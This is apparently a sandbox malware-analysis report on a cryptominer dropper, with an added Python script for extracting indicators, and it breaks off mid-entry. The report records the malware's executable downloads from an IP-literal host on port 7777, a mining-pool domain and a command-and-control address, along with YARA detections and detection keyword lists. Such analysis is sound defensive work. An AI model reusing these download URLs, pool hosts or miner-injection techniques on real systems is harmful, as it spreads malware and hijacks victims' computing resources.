Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown DNS traffic detected: queries for: mine.bmpool.org
Source: global traffic HTTP traffic detected: GET /cabura-cash.pw/sistem.exe HTTP/1.1Host: 45.82.70.152:7777Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cabura-cash.pw/4545.exe HTTP/1.1Host: 45.82.70.152:7777
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185 (50 identical entries; the report lists each connection separately)
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
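The network lines above carry three indicators a responder would want pulled out automatically: a DNS query for a hostname that looks like a mining pool (mine.bmpool.org), two executable downloads from an IP-literal host on the non-standard port 7777, and a long run of TCP connections to 95.143.179.185 that were never preceded by a DNS lookup. The Python below is an added example, not part of the sandbox report or its tooling; it parses lines in the report's own format (the sample lines are constructed from this section), flags them with a reason, and flattens the result into a block/hunt list. The port set, executable-extension set and pool-keyword list are assumptions chosen for illustration.

```python
import re
from collections import Counter

# Constructed sample: the network lines from this report, in the report's own format.
# The 50 repeated direct-to-IP lines are reproduced as the report lists them.
SAMPLE_LINES = [
    "DNS traffic detected: queries for: mine.bmpool.org",
    "HTTP traffic detected: GET /cabura-cash.pw/sistem.exe HTTP/1.1Host: 45.82.70.152:7777Connection: Keep-Alive",
    "HTTP traffic detected: GET /cabura-cash.pw/4545.exe HTTP/1.1Host: 45.82.70.152:7777",
] + ["TCP traffic detected without corresponding DNS query: 95.143.179.185"] * 50

# The report runs the request line and headers together, so "HTTP/1.1" abuts "Host:".
HTTP_RE = re.compile(
    r"HTTP traffic detected: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]"
    r"Host: (?P<host>[^:\s]+)(?::(?P<port>\d+))?"
)
DNS_RE = re.compile(r"DNS traffic detected: queries for: (?P<name>\S+)")
NODNS_RE = re.compile(
    r"TCP traffic detected without corresponding DNS query: (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

# Assumptions (tuning knobs, not values from the report):
STANDARD_HTTP_PORTS = {80, 443, 8080}
EXEC_EXTENSIONS = {"exe", "dll", "scr", "msi", "ps1", "bat"}
POOL_KEYWORDS = ("pool", "xmr", "mine", "monero", "hashvault", "nanopool")


def triage(lines):
    """Return one finding per suspicious HTTP request / DNS query, plus one per
    destination IP that was contacted without any DNS resolution (with a count)."""
    findings = []
    direct = Counter()
    for line in lines:
        m = HTTP_RE.search(line)
        if m:
            host, path = m["host"], m["path"]
            port = int(m["port"]) if m["port"] else 80
            reasons = []
            if IPV4_RE.fullmatch(host):
                reasons.append("ip-literal host")
            if port not in STANDARD_HTTP_PORTS:
                reasons.append(f"non-standard port {port}")
            if path.lower().rsplit(".", 1)[-1] in EXEC_EXTENSIONS:
                reasons.append("executable download")
            if reasons:
                findings.append({"type": "http", "host": host, "port": port, "path": path,
                                 "url": f"http://{host}:{port}{path}", "reasons": reasons})
            continue
        m = DNS_RE.search(line)
        if m:
            name = m["name"].lower().rstrip(".")
            if any(k in name for k in POOL_KEYWORDS):
                findings.append({"type": "dns", "name": name,
                                 "reasons": ["mining-pool keyword in hostname"]})
            continue
        m = NODNS_RE.search(line)
        if m:
            direct[m["ip"]] += 1
    for ip, count in direct.items():
        findings.append({"type": "tcp", "ip": ip, "count": count,
                         "reasons": ["connection without preceding DNS resolution"]})
    return findings


def extract_iocs(findings):
    """Flatten findings into the set of network indicators to block or hunt for."""
    iocs = set()
    for f in findings:
        if f["type"] == "http":
            iocs.add(f["url"])
            iocs.add(f["host"])
        elif f["type"] == "dns":
            iocs.add(f["name"])
        elif f["type"] == "tcp":
            iocs.add(f["ip"])
    return iocs


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f)
    print(sorted(extract_iocs(triage(SAMPLE_LINES))))
```

The TCP lines are counted rather than emitted one by one: a single direct-to-IP connection is noise, fifty of them to the same host over a short run is a persistent C2 or pool session (here the Stratum traffic the report detects separately). Run against a real report, the keyword heuristic will produce false positives on legitimate hostnames; it is meant as a first-pass sort, not a verdict.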

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

Malicious sample detected (through community Yara rule)
Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
PE file has nameless sections
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Detected potential crypto function
Creates driver files
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Uses 32bit PE files
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Yara signature match
Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
